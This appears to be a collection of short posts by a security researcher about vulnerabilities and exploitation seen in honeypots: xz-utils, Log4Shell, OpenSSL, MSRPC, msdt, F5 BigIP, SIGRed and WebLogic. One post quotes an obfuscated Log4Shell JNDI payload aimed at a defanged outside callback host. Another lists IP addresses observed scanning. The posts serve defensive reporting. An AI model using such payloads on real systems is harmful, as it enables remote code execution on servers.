To whoever is trying to run these Python backdoors on our F5
#BigIP
honeypot: Slow down... it doesn't work because you keep overwriting your files. Or randomize your filenames better.
A quick note about xz-utils backdoor:
1 - luckily, this was caught early.
2 - most run xz-utils 5.2/5.4. 5.6 is bad.
3 - quick check: `xz -V`
4 - Thanks to people who paid attention
#log4shell
is now a
@cnn
headline. This means: This is no longer an emergency. Going back to infocon green. Log4j will be a multi-year marathon. Do not treat it like a sprint or you will run out of breath quickly.
OpenSSL 3.0.7 is out. TL&DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat...
#openssl
Seeing now
#log4shell
exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)
so far I found 4 domains registered yesterday with the keyword "Beirut". They appear to be inactive so far. Be careful out there. Verify any entities asking for help.
#beirut
#lebanon
Please remember: Port 445 is just ONE of the ports that may reach
#RPC
(CVE-2022-26809) on Windows.
#MSRPC
does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open".
#allowlist
#dontblocklist
We are so far seeing 3 main types of useragents exploiting
#log4jshell
:
- "bingsearchlib[.]com" (not related to Bing/MSFT AFAIK)
- modified AutoMate 1.0 user agent
- user-agent with Base64 encoded exploit.
The
#msdt
0-day currently being exploited can be blocked by removing the handler. Note that this may block legit uses (but not sure there are any/enough to not apply this workaround).
Current Top IPs scanning for
#BigIP
#CVE20205902
@f5Networks
. cve-2020-5902
117.107.193.98 - Chinese EDU
103.220.209.47 - India Broadband
93.173.92.102 -Israel ISP
18.185.237.34 -Amazon EU
58.49.50.122 - Chinanet
52.119.83.108 -US Mobile ISP
179.9.166.185 -Chile ISP
The Microsoft DNS
#sigred
vulnerability (CVE-2020-1350) : drop what you are doing and patch it now (if this isn’t what your are doing..) if you don’t run MSFT DNS: double check...
After the initial flurry of scanning for the
#WebLogic
flaw yesterday, we are now seeing some "actual" exploit attempts. And of course, people poping calc.exe. If your WebLogic server has a Calculator running this morning: You have a problem!